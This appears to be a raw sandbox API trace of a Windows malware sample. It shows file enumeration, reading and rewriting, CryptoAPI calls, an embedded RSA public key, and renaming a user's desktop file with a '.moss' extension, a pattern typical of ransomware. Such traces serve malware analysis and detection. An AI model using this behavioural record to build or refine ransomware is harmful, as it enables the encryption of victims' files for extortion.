RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.250] GetCurrentThreadId () returned 0x324 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31dc0 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.251] GetCurrentThreadId () returned 0x324 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdb0 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdc8 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd98 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.252] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbde0 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdb0 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b5ea40 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b447b0 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.253] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b449c8 [0169.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.254] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449c8 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd98 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd80 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45350 | out: hHeap=0xcd0000) returned 1 [0169.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ea40 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.255] WriteFile (in: hFile=0x664, lpBuffer=0x3b53ea8*, nNumberOfBytesToWrite=0xab8e, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b53ea8*, lpNumberOfBytesWritten=0x401fb14*=0xab8e, lpOverlapped=0x0) returned 1 [0169.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b53ea8 | out: hHeap=0xcd0000) returned 1 [0169.255] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xab93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.256] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.256] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.256] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.256] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.256] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.256] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.256] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.256] CloseHandle (hObject=0x664) returned 1 [0169.258] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.258] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.258] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.258] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmA9JJhbA0oQ6ovas.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hma9jjhba0oq6ovas.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmA9JJhbA0oQ6ovas.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hma9jjhba0oq6ovas.mp3.moss")) returned 1 [0169.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.260] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.262] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a924c0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x26796730, ftLastAccessTime.dwHighDateTime=0x1d5d7c4, ftLastWriteTime.dwLowDateTime=0x26796730, ftLastWriteTime.dwHighDateTime=0x1d5d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xaa02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JEFgYE2 YDdJSyFXdv.swf", cAlternateFileName="JEFGYE~1.SWF")) returned 1 [0169.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.262] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JEFgYE2 YDdJSyFXdv.swf") returned=".swf" [0169.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JEFgYE2 YDdJSyFXdv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jefgye2 yddjsyfxdv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.262] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=43522) returned 1 [0169.262] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.266] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa9dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.266] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.268] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.268] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xaa02, lpOverlapped=0x0) returned 1 [0169.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.269] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.269] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.270] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.270] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.270] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.270] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.270] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.271] GetLastError () returned 0x0 [0169.271] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.271] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.271] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.271] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.271] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.271] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.271] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.271] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xaa00) returned 0x3b53ea8 [0169.271] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.271] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b62d40 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45350 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd80 